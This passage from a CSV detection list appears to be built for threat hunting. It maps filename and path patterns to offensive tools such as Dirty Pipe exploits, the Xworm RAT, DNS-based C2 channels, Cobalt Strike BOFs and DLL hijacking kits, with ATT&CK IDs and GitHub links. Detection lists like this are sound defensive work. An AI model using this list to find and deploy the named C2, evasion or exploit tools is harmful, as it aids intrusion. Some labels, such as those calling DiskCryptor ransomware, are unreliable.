tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","270","77","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" "*/Dirty-Pipe.sh*",".{0,1000}\/Dirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/Dirty-Pipe/main/exploit-static*",".{0,1000}\/Dirty\-Pipe\/main\/exploit\-static.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation 
tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/dirtypipez-exploit/*",".{0,1000}\/dirtypipez\-exploit\/.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*/DisableWD.dll,*",".{0,1000}\/DisableWD\.dll,.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" 
"*/DiscordBot.py*",".{0,1000}\/DiscordBot\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","1","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/disctopia.py*",".{0,1000}\/disctopia\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*/disctopia-c2*",".{0,1000}\/disctopia\-c2.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*/DiskCryptor.git*",".{0,1000}\/DiskCryptor\.git.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*/dist/fw_walk.*",".{0,1000}\/dist\/fw_walk\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*/dist:/dist_ext torat*",".{0,1000}\/dist\:\/dist_ext\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/distcc-cve2004-2687.nse*",".{0,1000}\/distcc\-cve2004\-2687\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/distopia-test*",".{0,1000}\/distopia\-test.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*/DKMC.git*",".{0,1000}\/DKMC\.git.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*/dkmc.py*",".{0,1000}\/dkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*/DLHell.git*",".{0,1000}\/DLHell\.git.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*/DLHell.py*",".{0,1000}\/DLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" 
"*/dll/inject/*",".{0,1000}\/dll\/inject\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/dllexploit.cpp*",".{0,1000}\/dllexploit\.cpp.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/dllexploit.exe*",".{0,1000}\/dllexploit\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/DllExport.bat*",".{0,1000}\/DllExport\.bat.{0,1000}","offensive_tool_keyword","C2 related 
tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*/DLL-Hijack*",".{0,1000}\/DLL\-Hijack.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*/dll-hijack-by-proxying.git*",".{0,1000}\/dll\-hijack\-by\-proxying\.git.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","1","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*/DLLHijackTest.git*",".{0,1000}\/DLLHijackTest\.git.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*/dllinjection_rs.exe*",".{0,1000}\/dllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/DllNotificationInjection.git*",".{0,1000}\/DllNotificationInjection\.git.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - 
T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*/DllProxy.git*",".{0,1000}\/DllProxy\.git.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","15","6","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*/dllproxy.nim*",".{0,1000}\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*/dlls/c2.c*",".{0,1000}\/dlls\/c2\.c.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/DLL-Spoofer.git*",".{0,1000}\/DLL\-Spoofer\.git.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" "*/dns_grabber.*",".{0,1000}\/dns_grabber\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/dns_spoof*",".{0,1000}\/dns_spoof.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/dns2tcp.git*",".{0,1000}\/dns2tcp\.git.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/dns2tcp/client/*",".{0,1000}\/dns2tcp\/client\/.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/dns2tcp/common/*",".{0,1000}\/dns2tcp\/common\/.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/dns2tcp/server*",".{0,1000}\/dns2tcp\/server.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" 
"*/dns-black-cat.git*",".{0,1000}\/dns\-black\-cat\.git.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*/dns-blacklist.nse*",".{0,1000}\/dns\-blacklist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-brute.nse*",".{0,1000}\/dns\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-cache-snoop.nse*",".{0,1000}\/dns\-cache\-snoop\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnscan.git*",".{0,1000}\/dnscan\.git.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/dnscan.py*",".{0,1000}\/dnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/dnscat.c*",".{0,1000}\/dnscat\.c.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*/dns-cat.exe*",".{0,1000}\/dns\-cat\.exe.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*/dnscat2.git*",".{0,1000}\/dnscat2\.git.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an 
encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*/dns-check-zone.nse*",".{0,1000}\/dns\-check\-zone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnschef.exe*",".{0,1000}\/dnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef.ini*",".{0,1000}\/dnschef\.ini.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef.log*",".{0,1000}\/dnschef\.log.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef.py*",".{0,1000}\/dnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef-ng.git*",".{0,1000}\/dnschef\-ng\.git.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. 
A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef-ng/*",".{0,1000}\/dnschef\-ng\/.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dns-client-subnet-scan.nse*",".{0,1000}\/dns\-client\-subnet\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnscnc.py*",".{0,1000}\/dnscnc\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/dnscrypt-proxy*",".{0,1000}\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*/dnscrypt-proxy.git*",".{0,1000}\/dnscrypt\-proxy\.git.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*/dnsdump.py*",".{0,1000}\/dnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory 